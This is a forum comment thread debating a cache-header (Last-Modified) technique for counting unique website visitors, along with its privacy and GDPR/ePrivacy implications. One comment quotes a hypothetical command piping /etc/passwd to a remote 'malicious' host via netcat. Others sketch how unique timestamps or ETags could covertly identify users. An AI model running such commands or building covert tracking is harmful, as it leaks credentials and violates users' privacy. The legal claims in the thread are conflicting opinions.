Threads like this kinda make me sad about HN. Every single comment is about how this technique might possibly be abused to track users in very specific scenarios (i.e. you may be able to identify your most active user).
If a web server wanted to track you, they would just use your IP. This is a clever technical trick to count your number of users without collecting any personal data. I don't understand why that is such a bad thing?
> If a web server wanted to track you, they would just use your IP.
I'd think a HN user would know that using an IP to track isn't effective.
For most home desktop users, at best, it tracks an individual household, not a person. For corporate users and highly privacy-conscious home users, it's probably completely worthless as VPNs will make everyone come from a single IP.
For mobile users, it's completely worthless. You'd be tracking users of a specific WiFi network. If your phone is connecting via IPv4, then who knows who you're tracking, as phones on a mobile network will share an IP address.
And if you think VPN users are too obscure a use case to account for, a specific case I've dealt with is (1) all of AOL coming from one IP in Virginia (yes this was a while ago) and (2) almost every university appearing as a single IP (on a website frequented by university students)
At a previous job we tracked unique visitors to prevent ad fraud. You'd find not only individual IPs with thousands of users behind them, but also larger populations of users numbering in the tens of thousands behind a small block of 8-16 IPs.
The craziest was a large multinational corporation that (I guess for security?) changed their egress IP daily. The first three octets remained the same and the fourth was equal to the day of the month UTC. Really screws things up when you use a 14 day rolling window of previous traffic for comparisons.
Universities do that now? When I was in college, if one connects to the visitor network they'd give you a RFC1918 address with NAT and a restrictive firewall, but if one connects to the regular network and authenticates as a student, they give you a publicly routable IP address.
Depends on a lot of factory. The primary school I was a student at had public IPs at every computer, our national academic and research network operators are encouraging local network operators to avoid private IPs. But the high school at which I'm currently a student, has private IP addresses on every computer and a single external IPv4 for the entire facility. It's not so one sided.
Many will also push http/https proxies regardless of
IP addressing schemes, so even if one user bypasses it,
anyone using defaults will come from whatever the external proxy IP is.
I went to a community college that did transparent HTTP proxying with not just deep packet inspection but caching and "security"-oriented javascript injection. Headers would get reordered, and its parser wasn't perfect so multi-line headers would get broken sometimes. They'd inject JS into pages to scan for... something? Other injected JS? I have no idea. But it was impossible to directly connect to another server without going through their proxy even though from the TCP layer it looked like you were. Lots of difficult to debug issues.
Oh man, an old employer had one that did the same HTTP header monkeying. I discovered it because it broke, of all things, the C2 wiki. I thought the wiki was down when sent a link to a coworker but then checked from my home machine (working remote but over Remote Desktop). And then, of course, had to figure out why it would work at home but not at work :D
I believe it was FortiGate but don’t quote me on that.
It also liked to drop idle TCP connections out of its routing table without sending a FIN or RST. HashiCorp Vault, at the time, only used TCP keep-alive and no additional in-band heartbeat mechanism. Naturally, the firewall dropped the idle connection earlier than the default keep-alive interval (which is long…). Additionally, packets sent to an IP-port combo that it didn’t have in its routing table were black holed, without an RST. We had this painful bug to chase where first thing every morning we could read but not write to Vault for a few minutes and then it work fine for the rest of the day without incident.
I left tcpdump running overnight to see it. At night no one was using Vault… first thing in the morning, the first write goes out to the existing (still valid on both sides according to netstat) but just disappears into the ether. Takes a few minutes for the write to timeout (while spamming retries) at which point Vault closed the connection and started a new one. I just about flipped the table over.
Sadly that's well beyond my memory now. It was pretty formative for me though because I learned a lot of networking and programming and unix stuff so that I could write a TCP-over-HTTP tunnel to a home server just to bypass it. So all in all, great success to be honest.
Interesting. There's a Fortinet product as well in our school. I bet it's corruption and some sysadmin is somehow earning money, because it's so obviously unnecessary.
And it's set to block games. Ironically, I tried playing minecraft on a library computer and the server connection succeeded. Worst of all, lichess.org is blocked so students have to compete using their LTE network during chess tournaments.
It shows that we have a part private part state owned company employed as sysadmins in our school. They don't really understand the needs of the school.
Last time I worked on a project that cared/tracked this (~4 years back), all the prepaid cellular data users from one of the big 4 telcos here ended up on CGNAT and appeared to come form a small pool of 4 IP addresses.
Just use IPv6, and all mobile users will have unique addresses (although they might rotate, and IP tracking is generally not very reliable, as other mentioned).
Counting is not the same as tracking. The technique proposed would in most cases be useless for trying to distinguish individuals, much less identify them. It's the computer equivalent of the person standing out in front of Costco with a clicker counter.
In principle, screen resolution would in most cases be useless for trying to distinguish individuals. After all, it wouldn't even distinguish the underlying hardware, let alone a user of that hardware. But given omnipresent tracking, it's one more bit that can be used to identify you.
In addition, your comment shows a severe lack of imagination. Suppose I'm a malicious server who wishes to track users.
* For each new user, select a random "late-modified" date. Now, I can clearly distinguish between multiple different users, because "1985-01-01T00:00:10" is probably the 10th visit from whoever was given "1985-01-01T00:00:00" on their first visit.
* If I have too many users for the above approach to uniquely identify a person, add more cached items. With HTTP/2, both HTTP requests would use the same TCP connection, so I can correlate the requests together.
And, bam. That goes from "useless for trying to distinguish individuals, much less identify them" to a unique identifier stored in the cache invalidation dates.
That is a different technique that uses the same medium of storage. When I say "this technique" I'm referring to specifically what was discussed in the article.
"Evil tracking companies will do evil things with any protocol features you give them" is already well known and there's not much to say about it that hasn't been said. What OP is actually doing is clever and new to me.
I agree that it is clever, and it is new to me as well. However, saying that an obvious extension to a technique (posted by multiple people independently, no less) is a different technique altogether and therefore not germane is going a bit far.
If I post a privilege escalation exploit that allows me to execute "cat /etc/sudoers", and somebody points out that it could also be used to execute "cat /etc/passwd | netcat malicious-remote-server.com", that's an obvious extension of the same technique. This is the same, where the same technique may be used for more intrusive attacks than are performed in the initial proof of concept.
This kind of attack isn't new, though, trackers have been using side channel tracking forever now. A quick search shows that this exact side channel tracking vulnerability was discussed in the year 2000 [0].
I'm not saying the technique isn't similar: I just object to people dogpiling on OP because other people can and do abuse the same header in nefarious ways. It's not constructive, just a pointless attack on someone who's actually trying to improve privacy.
I wasn't attempting to dogpile, and am sorry if it came across that way. I agree that this scheme would, if used as a replacement for cookies in the manner described by the OP, be a strict improvement on the current state. That's the first step in evaluating a proposed privacy improvement.
However, that is only sufficient if you already trust the operator of the server to maintain that same implementation. That may work for some threat models, such as a website that is currently run by a trusted individual that may later be bought by a malicious actor, but it isn't sufficient in all cases. Across the entire ecosystem, there's a sequence of questions that needs to be asked.
1. How would a non-malicious actor implement the proposed system?
2. What is the minimal amount of information that must be provided for a non-malicious actor to benefit from the proposed system?
3. What could a malicious actor do with that minimal amount of information?
4. If a malicious actor could use this information, are there additional steps the user can take to mitigate those effects?
Together, these questions help to predict the effects of the proposed implementation becoming the standard. Applying it to this article:
1. As described in the original post.
2. The browser must cache files according to the cache policy requested, and the browser provides accurate information about its cache for subsequent requests.
3. Answered in previous comments, that malicious actors could use this to reproduce the same information as is stored in cookies.
4. I'm not sure yet, but I'm picturing an approach where the "if-modified-since" header is deliberately varied for some requests, and abnormal results cause the caching policy of that website to be ignored as untrustworthy.
When people try to figure out what malicious acts could be done, it's moving the conversation from the first two questions and toward the last two questions. It isn't malicious, or reading into the original poster's intentions, but is an attempt to predict what malicious actions will eventually occur, and to implement mitigations as soon as possible.
Of course this technique could be abused by a bad actor. That's true of literally everything in computing. Do you think we should ban encryption because bad people might encrypt stuff?
TFA describes a way to provide basic analytics in a way that completely respects the user's privacy. That's a good thing.
Counting is not tracking, but counting unique visitors requires tracking to know they are unique. If the person outside of Costco is counting unique visitors, they must be tracking who has already visited and who has not. Even if they aren't doing anything else with that information and forgetting it each night, it is tracking. The existing abuse of tracking has led to a level of backlash where any tracking is seen through the worst possible lens.
It doesn't require tracking. Tracking would mean I could tell that user x has returned n times. But I have no idea who has returned, only that someone has returned n times.
The person standing outside Costco is counting people by giving them a colored sticker when they walk through the door. If they show up already having one, the counter issues a different color. Who has the stickers is unknown; only the number of stickers distributed in each color is known.
As has been said, this is not to say the technique couldn't be used for nefarious purposes. In this case, it's not, though.
That's still a form of tracking. Maybe not enough to identify unique users in some use cases, but even just knowing someone has been here n times is enough if the user numbers are low enough that you can identify users by unique n counts and patterns of n (such as if one user is at 500 and another is at 490, if the second one is logging in daily while the first one hasn't logged in for a few months, and you see the 490 go 491, 492... when they go from 499 to 500, the chance when a 500 logs on tomorrow and becomes 501 it was the 490 account that has been logging in daily).
Must admit, I've never thought of "number of times I've visited your site" as PII. Number of times I've visited every site in my browser history, maybe, but not "number of times I've visited this specific site". I'm thinking about it, but I'm not immediately convinced.
That's because you're forgetting the temporal domain. As in GP's example, a count alone may not mean much, but a time series of counts will allow you to uniquely identify a subset of the users.
Kinda need one for the other if you want to distinguish different users vs just one user clicking a lot.
You need some kind of identifier to differentiate between different sessions, and the moment you generate that ID, using whatever way, you are tracking user.
No, you don't need an ID. The article has one implementation that avoids IDs, but here's a simpler one:
Place a cookie HAS_BEEN_ON_SITE=true as soon as someone loads any page.
Voila, your server can now distinguish between users who've been to your site and users who haven't, without being able to tell recurring users apart from each other.
The implementation in the article is fancier, because the cache control headers allow distinguishing this on a page-by-page basis, but it's the same general idea. Don't give the client an ID, just ask the client to tell you if it's been there before.
Yes, but whether you legally must get consent is a separate question from whether you can count unique visitors while still being unable to tell them apart from each other.
Back in my days we called those "tracking pixels" and it didn't even need a cookie.
That's just not a real problem to solve. If you don't want to track users just giving each one unique ID is not a problem if you don't store them for future lookup.
The fact remains that from client perspective client have no way of telling whether you track them or not so you can't really prove to user you're not tracking them.
Reminder that the GDPR does not care about cookies specifically but about personal data and tracking in general. Using the the cache invalidation for tracking does not require any less consent then the equivalent cookie.
However, it does look like the ePrivacy Regulation will clear this specific case up, at least according to Wikipedia:
> The proposal also clarifies that no consent is needed for non-privacy-intrusive cookies improving internet experience (like to remember shopping cart history) or cookies used by a website to count the number of visitors.
Its not like that is a far walk though. Its the exact same technique, just storing different data.
Respectfully i feel like this would be like seeing an example of css turning a page blue and claiming the technique is useless for turning the page red because that is not the specific example used.
If a bunch of people got up in arms and started complaining because the author of said CSS example hadn't considered that their code could be changed slightly to produce a hate symbol, I'd definitely still jump in and say "but that's not what they were doing!"
Depends how you define relevant. Since actively trying to block stalky advertising behaviours I've had more interesting adverts (by “interesting” I mean new-to-me, not the “do you want another one of the thing you've already bought all you need of for a while” types). Things are relevant enough if, for instance, I get running related adverts while reading an article about other runners or browsing shoes.
In my experience the stalky behaviour doesn't improve the advertising relevance from my PoV, so the fact it means that all that derived information, some of it definitely PII, is out there so should anyone be able to hack into it they could use it for fraudulent purposes (identity theft, spear-fishing my contacts, …), makes the situation lose-lose for me.
It is worse for other people, as they have information that advertisers like to derive that might be extra sensitive. Being white, male, cis, middle-class, ete, with a life not interesting enough for there to be much to convincingly blackmail or threaten me about, living in western Europe, I'm pretty safe, but this can't be said for others especially in certain parts of the world (scarily religious ruled countries with bad records on individual rights, like Qatar and America to give two examples).
I think you're conflating two different kinds of surveillance. The article is incrementing a counter to track the number of unique visitors.
If one is worried about blackmail or violence, especially from a government, then one should take precautions beyond complaining about the prevalence of browser cookies. Modern life, carrying a mobile internet device with GPS service, using a credit card, and going to places with security cameras, presents a variety of surveillance methods.
I was replying to the, well, the comment I replied to, rather than the counter method that started the thread. That post was anecdata about not minding being tracked, mine was anecdata regarding why I prefer we would not be.
> especially from a government
Where I to live in a regime like I mentioned above, I'd be as worried about vigilantism as much as government action.
> presents a variety of surveillance methods.
Fair point, but I see a difference between choosing to take a risk and companies trying to follow me around whether I want them to it not. Maybe it is my monkey brain that grew up noticeably before such tech was ubiquitous, said brain having been taught that being followed was at best a bit creepy!
I used to follow the "I should keep everything private!" mantra that so many software engineers keep. Then I took a gig in advertising and realized how much information companies have despite my privacy efforts and learned to "love the bomb" so to speak.
To fight the problems posed by ubiquitous corporate and government surveillance, I suggest ubiquitous public surveillance. Like streamers do, but everywhere, all the time, publicly broadcasted. If I get disappeared, at least it'll be televised.
> vigilantism
There's a difference between being embedded in a supportive community, afraid of violence from outsiders, and being embedded in an antagonistic society, afraid of violence from insiders. In the former, ubiquitous public surveillance might help. In the latter, I think there is nothing to do but emigrate.
I don't want any unsolicited advertising - and I wish our societies would decide to outright ban advertising: Outdoor advertising is a nuisance for the eyes, radio and TV advertising is annoying AF (particularly as it tends to be mixed at a much greater loudness than the program running, my conspiracy theory is that this is done so people are forced to hear it when they go to the loo), paper advertising (e.g. in newspapers, flyers or postal spam) is a waste of paper and online advertising is an insane danger for privacy and a vector for distribution of malware.
Ideally, we'd have independent consumer protection entities, either government or private (e.g. German Stiftung Warentest), that would get products from companies to rank and test, so consumers could make actually informed decisions instead of being lured by hyped up advertising claims.
At the margin, it's very hard to tell the difference between advertisements and other media. Today I listened to an enjoyable podcast with 5 speakers, 2 of whom are employed by the same company. During the episode, they discussed a product that those 2 worked on. Was this an advertisement?
I think any ban like that would have a "I know it when I see it" standard, which isn't wonderful.
Storing a cookie with a counter still requires consent afaik. If I am right, then this technique is not sufficiently different and also requires consent.
Consent is always required; even if you just give people a random UUID, with no associated session/etc., that always requires consent.
There is a separate question, of whether consent is implied. If the identifying information is required to provide the user with a service they requested (e.g. a cookie for their online shopping cart), then consent is implied; no need to ask.
I don’t think this would require consent. It is not, as described in the post, uniquely identifying. It is not even pseudononymous. Thus, it is not personal data and does not require consent.
Without viable alternatives, sites will continue to use Google Analytics. If people like you fear-monger every alternative, sites will continue to use Google Analytics.
The method described in the article collects no personal data, collects no identifiable data, and is objectively more user-respecting than Google Analytics. But the behavior by people like you will help make sure that these alternatives don't gain traction and Google maintains their monopoly.
Not only that. The ability to track your own visitors is BUILT INTO how the web operates.
All a site has to do is include analytics in its server-side library. And that’s it. Doesnt even need CNAME cloaking. It can send the analytics anywhere.
The thing ITP and others try to stop is tracking users ACROSS sites.
But if you use single-sign-on with FB or any other service, they can get your public photo, name and just find you on faceboon thru some search engine that spidered all profiles.
So if you really want to be anonymous, stop using the single sign on and reusing passwords etc.
Has Apple’s ITP closed this particular loophole by ignoring etags in third party iframes and capping them to 7 days etc. ?
It seems browsers will want to restrict ALL first party cookies to 7 days unless the visitor explicitly allows some domain to store their identity.
Frankly speaking, identity can be done better without cookies. Look at Web3 sign-ins, we need something built into the browser and seamless. For now maybe an extension. Then browser makers can have a privacy mode that retires cookies, entirely.
But how are you supposed to do caching without storing and sending identifying data equivalent to cookies?
My understanding is that most commenters are less critical of this specific implementation, but are alarmed by how this new technique could be used by other more nefarious parties in the future.
Counting visits is probably still not a fully GDPR-complaint use case, as the server stores data on the client's machine which is indistinguishable from a cookie containing a counter.
IANAL, but I spent a lot of time talking to them about GDPR.
First, this data does not and could not be used, if implemented as described in the post, to uniquely identify someone. As such, it is not personal data and not in scope of GDPR.
I'm pretty sure the police will also have bigger fish to fry than someone who nicks your wallet. But somehow I don't don't you'd see that as a good argument for why that behavior shouldn't be accepted.
First, an IP address is considered personal data in the EU.
Second, an IP address is not enough, it may change or be shared. The advertisers ‘need’ to track you forever to serve you relevant ads. So they devise all kinds of tricks to do so.
> First, an IP address is considered personal data in the EU.
I don’t believe that’s true. To my knowledge, GDPR only treats IP address as personal data if it is associated with actual identifying information (like name or address). Collecting IP address alone, and not associating it with anything else, is completely fine (otherwise nginx and apache's default configs would violate GDPR), and through them basically every website would violate GDPR.
That's correct. IP addresses are not personal data in themselves but they may become so if further data are collected or accessible which allow to identify individuals when used together with IP addresses.
CGNAT complicates matters even further. Sometimes I'm placed way off within <country> if a site tries to go by GeoIP databases, as the provider placed a bunch of households behind a single address.
After decades of straight-up abuse by this sector of the industry, including the subversion of countless "privacy respecting" data collection techniques, I think an extraordinary amount of skepticism and suspicion is more than understandable.
Why would you put privacy respecting in quotes? The subversion of those techniques are probably just because those techniques are so new and people haven't had better technologies yet.
I personally consider those privacy respecting data collection techniques as a parallel with the development and use of cryptography on the web. In the beginning pretty much no one online used cryptography; later on we started using them but used weak ones ("export" cipher suites for example, or just look at the issues in early protocols like SSL 2.0 or SSL 3.0); nowadays almost everyone uses strong cryptography. Similarly, in the beginning pretty much no one cared about privacy when they did data collection; then we had begun to care more about privacy, but many schemes are easily broken due to for example misguided ideas of anonymization ("anonymization by hashing"), and we are also starting to see the development of newer private information retrieval schemes and differential privacy, etc. Unlike the cynics on this HN thread, I am quite confident that maybe a decade down the road the majority of data collection done by companies will be in a privacy preserving manner. Of course there will be outliers much like there are still websites that don't use https but those will be few and far between.
I quoted the term not with the intention of disparaging the notion, but to indicate that I'm referring to a specific class of approaches. That said, the term has also been abused to the point where when it's used, I immediately doubt that it's accurate.
It's not a clever technical trick. It's a pointless technical trick.
You can do exactly the same thing with cookies and they are better for privacy because there's an opt out mechanism. They're how you're supposed to do this sort of thing.
Using a trick like this is no different to cookies in the eyes of the GDPR. So the only reason to use this trick is if you don't want to respect your users' privacy by being able to block cookies.
This is significantly different from than cookies from a GDPR perspective. This is not uniquely identifying. There is no way for the site to know if you are this user who has visited 100 times or that user who was visited 100 times.
There are at least three fallacies with stuff like GDPR that trigger anxiety in people by convincing them that they can somehow safeguard their own privacy while surfing hundreds of websites per day, many in other countries. I'm not going to fully discredit them, just give counterexamples:
1) The internet can continue to work without tracking users
- Targeted advertising (can't have both, although I can't say that I'll miss ads)
2) Users care that companies have their personally identifiable information (PII)
- Users care how companies share and abuse their data for profit (they already know they're being tracked if they don't use something like TorBrowser)
So I view all of this security theater with utter skepticism. I think the only thing that can maybe save us is transparency. Letting users download their data and using the threat of audit to keep internet companies honest:
The rest of the squabbling about "no that's PII, you can't save that!" has only resulted in endless nagging and distraction. It's like trying to hide your address from the post office or thinking that your phone number is secret because it's not in the phonebook.
Although I do think it's kind of funny to make big companies feel like they're living under a police state. They'll work tirelessly to undermine these protections, which is why we'll eventually abandon them like we did with prohibition and McCarthyism because they just aren't enforceable when everyone is breaking the law. Or (equally likely) they'll work to bolster these laws to create new markets through power imbalance, ensuring that only the largest companies can meet compliance and smaller companies pay some sort of protection money against the threat of litigation, which opens the door to mass corruption. Both of these scenarios are ugly enough that I think this entire rabbit hole is suspect.
I think this is probably illegal in EU countries. The ePrivacy Directive requires consent before storing data on a user's machine that isn't strictly necessary for providing the service the user requested. Analytics isn't "strictly necessary", and ePrivacy doesn't care whether you use the Cookie header or some other method of storage.
The directive is a bit hard to read, but its widely understood to require at least notification before storing information on a user's device, probably consent. The guidance is a lot clearer: https://ec.europa.eu/justice/article-29/documentation/opinio...
Assuming you're correct, can anyone think of a way to count unique visitors without storing data on a users machine or using identifiable user information? Identifiable user information should include hashes that can be re-computed given the original information.
This isn't a criticism of the law, I'm just curious what options there could be, because I can't think of any.
Ha, that would explain that question. My first reaction was mostly confusion as there is so much prior art at this point, i.e. fingerprinting through installed add-ons, resolution/window size/system language, browser language, IP locality etc. There are even demo pages around which shows you just how unique your configuration is even without anything else.
the only reason we could think of for wanting unique visitors was for the marketing people or investors/stakeholders/shareholders. Parsing the request logs should be sufficient for every other metric.
We had a bunch of meetings about this at what essentially amounted to a giant information superhighway billboard company. IIRC someone brought up using cache headers even back then, because it didn't require cookies or javascript, which we couldn't guarantee would be "up to date", this is back in "target IE6, still" days.
As one of my networking friends said, advertisers usually know everything about your metrics, even if you don't. You can't really fudge the numbers in your favor, so raw requests or QPS or whatever ancillary metric would be enough.
the method in the article is defeated by clearing your session when you're done browsing, or using incognito/private browsing tab, as that should mark all "cached" items for deletion.
I thought GDPR cared mostly about uniquely identifying visitors which this does not do. You still need a cookie banner to state that you will put some data on their machine but you always need one of those.
That claim is false in Europe. You need to ask permission for this approach, because you're storing something on the user's device (the generated date in the cache) that isn't strictly necessarily. The ePrivacy directive says you need permission for that, nowhere does the law specify "cookies" it's about any kind of data stored on the user device.
True it does not matter if it’s a cookie, or whatever. You need to look to the ePrivacy directive article 5.3 for which exemption case applies. In the case of timestamps, it would be case A :
> when the cookie is used “for the sole purpose of carrying out the transmission of a communication over an electronic communications network” (“Exemption A“)
Since the timestamp is no longer used solely for this purpose, you need consent.
Cabin doesn't store a row in a database for each visit. It only stores one row, per day per domain. The attributes for that row are simple tally counts - visits, uniques, bounces etc. So no identifier is stored, and the hits go into the tally. We do not store the fact that a user has visited x amount of times. The demo here is to show how the technique works.
Cabin used to detect only the presence of any last-modified date to determine if the visit is unique or not. But extending it to distinguish hits 1,2 and 3 (by adding 1 second to the start of the day) now allows us to count the bounce rates too.
Your landing page says "no cookies or consent banners" and "compliant with all privacy laws", but the timestamp approach stores data on a user's computer in a way that is not "strictly necessary in order to provide an information society service explicitly requested by the subscriber or user". Could you explain how you see your approach as compliant with the ePrivacy directive?
So the moral of the story is to use passive fingerprinting that is able to identify and track individual users, because then you can skip the cookie banner and be compliant with the law?
I think I would rather use this and rely on the courts to interpret it fairly if it ever came to that, which it won't.
I personally don't have an issue with it, but one thing that might set some of the people here at ease is if you stopped incrementing the timestamp after the second visit.
This would give you three possible states anyone could be in: never visited, visited once, and visited more than once. It's less data, but still enough to give you your bounce rate and your total visits while minimizing the number of boxes you're sorting individual visitors into.
How do you distinguish two users with the same date stamp, to know they are two diff visitors?
User A: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
User A: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
User B: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
User B: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
Next you see:
User ?: last-modified: Wed, 30 Nov 2022 00:00:02 GMT
Which user is it?
And have you had 2 count of visits, or 3 count? How do you know?
Finally, these aren't really counting visitors, but views, of this URL, by this browser, right?
There's a conventional taxonomy of terms for web stats, something like:
- users (as in MAU)
- visitors or uniques (typically daily uniques)
- visits or sessions (multiple views from one visitor in a cluster)
- views or pageviews (.html pages)
- hits or requests (every object gotten from server: .html, .js, .jpg, etc.)
Looks like your GIST is causing a remote user agent to store a count of its own views.
// I haven't tried it, just a quick skim of the blog and the gist, raising this question. I'm probably missing something.
How I'm interpreting their explanations is that they don't (can't) tell which user it is. They just know you've had two two-time visitors, and one one-time visitor.
Have lawyers familiar with EU law vetted your technique? Could you share their legal reasoning? If not, why would anyone ever take the risk to use your product and face huge fines?
I am all for privacy, use uBO, Firefox Focus / Incognito and Google alternatives. But if I have to consult a lawyer each time I write some code or write up a blog post, I'll take up gardening instead.
How about just consulting a lawyer each time you abuse a protocol to get user's software to behave in a way that is invisible to them and benefits you?
There is already a correct way to tell a browser to tell the server something with each subsequent request: Cookies. Nobody needs to "write some code" here; it's already written. Working around the protocol isn't engineering, it's just lying.
This blog post is just another cynical degredation of trust between users and their browsers, and browers and the servers they talk to. Just another part of HTTP that we can't use for what it was designed for anymore because servers want so desperately to track visitors uniquely and a significant subset of visitors would prefer not to be remembered uniquely.
It doesn't track visitors. It just counts how many came back and how many bounced. It's very privacy friendly, but still doesn't meet your standards? I think you just like to complain.
This is simple. Why not use cookies? Because people don’t like cookies, or people delete cookies, or there are regulations surrounding cookies. So we’re doing what cookies are for with a different part of the protocol to circumvent all those issues.
Though, of course, it doesn’t circumvent any of them. Nobody who firmly rejects cookies is amused, and no court that ever made a cookie-consent law will shrug its shoulders and say “technically it’s not a cookie so I guess they’re in the clear”.
It’s ridiculous to call this privacy friendly, and I think you just like to track your users without asking.
Instead of putting a real, appropriate value in "last-modified", we're putting an arbitrary value, totally unrelated to actual response caching that the user's browser will unwittingly use next time it calls us and in so doing remind us of something about them. Maybe all it reminds us of is visit count, because we have restraint and that's all we're exploiting this for (for now). So now, for the third time:
Why not use a cookie?
The problem with this is encoded in the answer to that question. You're being willfully ignorant if you can't see that the answer to that question is: "Because I don't like certain governments, users, and user agents' way of handling cookies (e.g. deleting them, or requiring consent)".
So you agree it doesn't track users. At least we're on the same page there now.
Why not use a cookie? Because then they can't advertise that they don't use cookies. It's like how they put No-GMO label on food that doesn't even have GMO crop varieties. It's meaningless, but people are uneducated on the subject so it sells products.
You could use a cookie here, and you could do it completely legally without requiring consent. The laws don't care about cookies or other technical implementations, they care about tracking. So the reason to use this cache header instead of cookies is simply because people are uniformed on the subject and it sells better this way.
> Why not use a cookie? Because then they can't advertise that they don't use cookies.
Oh, so they can be craven motherfuckers who abuse protocols for the sake of web analytics. With you so far.
> The laws don't care about cookies or other technical implementations, they care about tracking.
This is flat-out wrong. The law cares about any cookies that aren't strictly necessary for the site's operation. This very well might qualify as a cookie that isn't strictly necessary for the site's operation. It's not implemented as a cookie, but what you say is half right; "the laws don't care about... technical implementations". A judge might not care that you've come up with a clever way of storing your cookie with a different header. It's the same thing as a cookie, and it's not necessary for the site's operation.
Even the good guys are craven motherfuckers to you. Who does measure up to your standards of flawless perfection?
This is an analytics service that respects user privacy. We would be wishing them all the success in the world, not criticizing them for not meeting your ridiculous notions of HTTP header purity.
What a ridiculous notion! Using cookies when you want to set a cookie! Absurd! What we are trying to do is set a cookie while also proclaiming to the world that we don’t use cookies. What’s the matter with that?
I’m sorry, but “I want to sort of lie” is just not a very compelling reason to me. I guess I just have ridiculously high standards.
No need for this kind of hyperbole. I wouldn't ask this question if the OP's post didn't contain grandiose claims such as "No cookies, no consent banners, no ad networks, 100% GDPR & CCPA compliant, low footprint web analytics." OP made a claim about their compliance with EU law. I'm asking for proof or at least an explanation.
I think the comments on this post would probably less hostile if the title said something like "detect the number of unique visitors", which is what I believe it's doing, rather than detecting unique visitors using unique timestamps, which is what many seem to be guessing based on the headline alone.
It would be interesting if it is also possible to abuse it. If it is possible to create enough unique timestamps, that browsers still accept them. Can you add milliseconds to the TS, and do browsers store them too? Or do browsers also accept timestamps from months or years back and re-send them? If you can use the whole scale of Unix time (int32), there is a huge pool of entropy available.
In this case they don’t do this evil thing, and it probably would still violate the European GDPR, even if it’s not an actual cookie, but somebody has to find it first.
Ooh that's kinda evil. A server could give a client a uniquely identifying ETag for a given URL. So whenever the client comes back on the same browser, they're identified.
Fortunately this is probably just as detectable as the Last-Modified abuse in the post.
The fact that this is being used in an analytics product that claims to be compliant with all privacy laws is horrifying. There’s no way this is compliant and it’s deceptive.
Arguably this can become personally identifiable, much like a persons height of 7 feet becomes personally identifiable. How many 7 foot people live in Elko Nevada? (I have no idea, perhaps there's an entire colony of them.) But most very tall people, well, stand out. "You're that tall guy from Elko!"
Early on, it's not personally identifiable. No doubt there can be a lot of folks visiting the site only 10 times and never again.
But as someone continues to visit, they begin to narrow down who they are to "You're that guy that comes in here every day with a yellow hat". They may not "know" who you are but, they "know" who you are.
Eventually, there may be that one person that has the highest hit rate, who always stands out.
> You're that guy that comes in here every day with a yellow hat
Yes but you have absolutely nothing at all to associate that back to a person. Where are you going to find the data "personal information of some kind of the people who visit your site a lot?" You're not collecting it.
> Processing personal data to generate the cohort assignment without the proper consent could also be a violation
Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?
> Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?
Quoting the European commission:
"Personal data is any information that relates to an identified or identifiable living individual. Different pieces of information, which collected together can lead to the identification of a particular person, also constitute personal data."
I'd hazard a guess that it's the second part under which the EC might find this to be within scope.
The definition of personal data under the GDPR is anything that can be used to uniquely identify a natural person (with sufficiently high probability). Both cookies and date-modified meet that definition identically, as do IP addresses.
That doesn't mean you can't use it at all. It just places strong restrictions on what purpodes you can use it for. The important point is just that those restrictions are the same under GDPR for all of these technologies. It doesn't matter how you uniquely identify users, what matters is what you do with that information.
They don't assign a unique date-modified to each user. They assign everyone the same date modified on their first visit of the day. I don't accept that this could be used to uniquely identify a natural person.
You may be able to look at the headers and see that a certain user made the most requests that day. That still tells you nothing about their identity.
Nothing in the technique described here allows to identify an individual directly or indirectly because 'identifiers' are not unique and really no different than standard 'last-modified' dates. Even if they were unique further data would have to be collected in order to be able to identify individuals and turn everything into personal data.
What the technique may fall foul of, though, are cookie laws.
You can't just scare quotes anonymous without explaining how it could deanonymize you. You're sitting there with full access to the count data they collect. Use any statistical methods you like, figure out what visits were me.
That seems very different, as those cohorts are based on actual personal data (correct me if I’ve misunderstood this about FLoC). That’s fundamentally different from a counter I think.
Yes that’s right, FLoC is explicitly using personal data. But now consider that that data is “you visited a gardening website in the past month” and compare it with “you visited this website 3 times yesterday” and the two methods don’t look so different.
I guess we all have different instincts when it comes to this, but I find it much more expected and acceptable that a website can see that I’m returning, than that they get to know about random other interests I have based on my general browsing history.
The article you quote does not suggest that "assigning users into “anonymous” cohorts is ... is likely not GDPR compliant" and I fail to see how that would be the case. Rather it seems to mention concerns that processing personal data to do so may be problematic.
Storing a cache header is not an issue, but if it is used as a unique identifier for user analytics purposes, it is almost certainly personally identifying information, at least after combining with other data. Since they are not disclosing that they store something they use to ID users, it is likely a GDPR violation, at least in spirit, and that spirit is exactly what GDPR seeks to control.
It is personal data regardless of how it is used. The only question is if that use of personal data is permissive.
Using it for user analytics, which is neither required to run the service, nor in the users interest, nor reasonably expected by the user, is almost definitly illegitimate use.
This is a form of data collection and tracking that is definitely against GDPR unless the user is informed of it and consents to it. As it stands, there is no such notification or consent. IANAL but I strongly suspect will get you fined in the EU.
GDPR doesn't just cover personal info, it also forbids tracking without consent, which includes cookies and other means. This is just a technical trick to track someone sans cookie, so I'm 100% certain they will fine anyone doing it unless they get consent.
The GDPR is entirely about personal data stored by the processor [0]. In principle, if the tracking is entirely client-side, and never produces any traces in how the client accesses your server, then the GDPR alone has no ability to stop it. (Not to say that it cannot run afoul of other regulations.) If the results of the tracking are somehow sent back to your server, then it most likely becomes personal data subject to the GDPR.
Only multiple requests within a given second get the same time stamp. So if you have less than 86k hits per day, then all your time stamps could be unique.
Edit: I misread the article here, where it said each visit incremented the counter by one second. So my calculation is not correct!
It is designed to track unique visitors, but not differentiate between them at all.
both you and i visit the same new site today, we both get a file our browser caches with today's date at 00:00:01. Tomorrow when we go to the same site, our browser says we got the file yesterday, so the server sends a new modified date to the browser, set to tomorrow's date at 00:00:02. Both of us have the same "new" file with the new modification date/time.
if i go back the following day, the only thing the server knows for certain, from just this header, is that i've visited twice before. So i'm not counted as a unique visitor.
That this could be used by assigning a unique timestamp to each visitor is where everyone's mind is going, and it feels like half are annoyed there's another way to leak information, and the other half are annoyed they didn't think of it prior to the end-of-year marketing bonus deadline.
The technique could be used for a lot of tracking.
However, it sounds like they're using it just for quite minimal tracking. It sounds like the only thing they're tracking is how many people viewed the site how many times. They'll know that on a particular day, 1 person viewed the site 500 times, but won't know anything identifying about that person (e.g. IP, name, gender, any sort of unique ID).
